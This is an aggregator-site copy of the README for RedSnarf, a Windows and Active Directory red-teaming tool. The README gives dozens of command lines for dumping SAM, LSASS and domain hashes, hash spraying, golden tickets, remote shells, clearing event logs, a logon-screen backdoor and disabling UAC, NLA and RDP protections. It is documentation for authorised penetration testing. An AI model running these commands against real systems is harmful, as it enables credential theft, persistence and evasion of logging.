GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → nccgroup → Redsnarf

nccgroup / Redsnarf

Licence: apache-2.0
RedSnarf is a pen-testing / red-teaming tool for Windows environments

Programming Languages

python
139335 projects - #7 most used programming language
powershell
5483 projects

Labels

windowspentestingactive-directory

Projects that are alternatives of or similar to Redsnarf

A Red Teamer Diaries
RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.
Stars: ✭ 382 (-65.55%)
Mutual labels:  pentesting, active-directory
Deathstar
Uses Empire's (https://github.com/BC-SECURITY/Empire) RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.
Stars: ✭ 1,221 (+10.1%)
Mutual labels:  pentesting, active-directory
Crackmapexec
A swiss army knife for pentesting networks
Stars: ✭ 5,445 (+390.98%)
Mutual labels:  pentesting, active-directory
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 1,392 (+25.52%)
Mutual labels:  pentesting, active-directory
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (-21.55%)
Mutual labels:  pentesting, active-directory
Dnsbrute
DNS Sub-domain brute forcer, in Python + gevent
Stars: ✭ 40 (-96.39%)
Mutual labels:  pentesting
Pentesting Bible
Learn ethical hacking.Learn about reconnaissance,windows/linux hacking,attacking web technologies,and pen testing wireless networks.Resources for learning malware analysis and reverse engineering.
Stars: ✭ 8,981 (+709.83%)
Mutual labels:  pentesting
Eyes
👀 🖥️ Golang rewrite of eyes.sh. Let's you perform domain/IP address information gathering. Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?" 🔍 🕵️
Stars: ✭ 38 (-96.57%)
Mutual labels:  pentesting
Social Analyzer
API, CLI & Web App for analyzing & finding a person's profile across +1000 social media \ websites (Detections are updated regularly by automated systems)
Stars: ✭ 8,449 (+661.86%)
Mutual labels:  pentesting
Kill Router
Ferramenta para quebrar senhas administrativas de roteadores Wireless, routers, switches e outras plataformas de gestão de serviços de rede autenticados.
Stars: ✭ 57 (-94.86%)
Mutual labels:  pentesting
Nmap Nse Info
Browse and search through nmap's NSE scripts.
Stars: ✭ 54 (-95.13%)
Mutual labels:  pentesting
Milky
A .NET Standard library for pentesting web apps against credential stuffing attacks.
Stars: ✭ 49 (-95.58%)
Mutual labels:  pentesting
Keylogger
A simple keylogger for Windows, Linux and Mac
Stars: ✭ 1,007 (-9.2%)
Mutual labels:  pentesting
Oscp
My OSCP journey
Stars: ✭ 50 (-95.49%)
Mutual labels:  pentesting
Verdaccio Ldap
LDAP auth plugin for verdaccio
Stars: ✭ 39 (-96.48%)
Mutual labels:  active-directory
Burpsuite Collections
BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程,欢迎添砖加瓦---burpsuite-pro burpsuite-extender burpsuite cracked-version hackbar hacktools fuzzing fuzz-testing burp-plugin burp-extensions bapp-store brute-force-attacks brute-force-passwords waf sqlmap jar
Stars: ✭ 1,081 (-2.52%)
Mutual labels:  pentesting
Dirhunt
Find web directories without bruteforce
Stars: ✭ 983 (-11.36%)
Mutual labels:  pentesting
Privesccheck
Privilege Escalation Enumeration Script for Windows
Stars: ✭ 1,032 (-6.94%)
Mutual labels:  pentesting
Spellbook
Micro-framework for rapid development of reusable security tools
Stars: ✭ 53 (-95.22%)
Mutual labels:  pentesting
Aspnetmvcactivedirectoryowin
ASP.Net MVC with Active Directory Authentication using Owin Middleware
Stars: ✭ 44 (-96.03%)
Mutual labels:  active-directory
View All Similar Projects ➔ 
    ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         
                                  [email protected]
                                                  @redsnarf

GitHub license

RedSnarf is a pen-testing / red-teaming tool by Ed Williams for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques.

See our YouTube Channel for Videos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

RedSnarf functionality includes:

• Retrieval of local SAM hashes
• Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password;
• Retrieval of MS cached credentials;
• Pass-the-hash;
• Quickly identify weak and guessable username/password combinations (default of administrator/Password01);
• The ability to retrieve hashes across a range;
• Hash spraying -
Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;
• Lsass dump for offline analysis with Mimikatz;
• Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;
• Dumping of Domain controller hashes using the drsuapi method;
• Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator';
• Ability to decrypt cpassword hashes;
• Ability to start a shell on a remote machine;
• The ability to clear the event logs (application, security, setup or system); (Internal Version only)
• Results are saved on a per-host basis for analysis.
• Enable/Disable RDP on a remote machine.
• Change RDP port from 3389 to 443 on a remote machine.
• Enable/Disable NLA on a remote machine.
• Find where users are logged in on remote machines.
• Backdoor Windows Logon Screen
• Enable/Disable UAC on a remote machine.
• Stealth mimikatz added.
• Parsing of domain hashes
• Ability to determine which accounts are enabled/disabled
• Take a screen shot of a Remote logged on Active Users Desktop
• Record Remote logged on Active Users Desktop
• Decrypt Windows CPassword
• Decrypt WinSCP Password
• Get User SPN's
• Retrieve WIFI passwords from remote machines

RedSnarf Usage

Requirements:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - used with parsing Mimikatz info locally

Show Help
./redsnarf.py -h
./redsnarf.py --help

Retrieve Local Hashes

Retrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log
./redsnarf.py -H ip=10.0.0.50 -uC security

Retrieve Local Hashes from a single machine using weak local credentials and clearing the application event log
./redsnarf.py -H ip=10.0.0.50 -uC application

Retrieve Local Hashes from a single machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Retrieve Local Hashes from a single machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Retrieve Hashes across a network range using local administrator credentials
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Hash Spraying

Spray Hashes across a network range
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Retrieve Hashes across a network range domain login
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Quickly Check Credentials
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Quickly Check File containing usernames (-hS) and a generic password (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

Retrieve Domain Hashes

Retrieve Hashes using drsuapi method (Quickest)
This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Retrieve Hashes using NTDSUtil
This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Golden Ticket Generation
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

Information Gathering

Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Decrypt Cpassword
./redsnarf.py -uG cpassword

Find User - Live
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Find User - Offline (searches pre downloaded information)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Display NT AUTHORITY\SYSTEM Tasklist
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Screenshot the Desktop of a Remote Logged on Active User
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

Misc

Start a Shell on a machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Start a Shell on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Run stealth mimikatz, this option fires up a web-server to serve a powershell script, this is obfusctaed and encoded machine side, data doesnt touch disk - creds are grepped for in an easy to read style and echoed back to screen.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Run Custom Command
Example 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Example 2 - Double Quotes need to be escaped with \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Local Access Token Policy
Creates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the registry and either enable or disable Local Access Token Policy settings.
./redsnarf.py -rL y

Wdigest
Enable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Disable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Query UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC
Enable UAC registry value on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Disable UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Query UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Backdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate
Enable Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Disable Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Query Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon
Enable Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Disable Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Query Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Lock a remote machine user session using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y

RDP

Enable RDP on a machine using domain administrator credentials ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Disable RDP on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Query RDP status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Change RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Change RDP Port to default of 3389 on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Query RDP Port Value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Enable Multi-RDP with Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Enable RDP SingleSessionPerUser on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Disable RDP SingleSessionPerUser on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Query RDP SingleSessionPerUser status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q

NLA

Enable NLA on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Disable NLA on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Query NLA status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].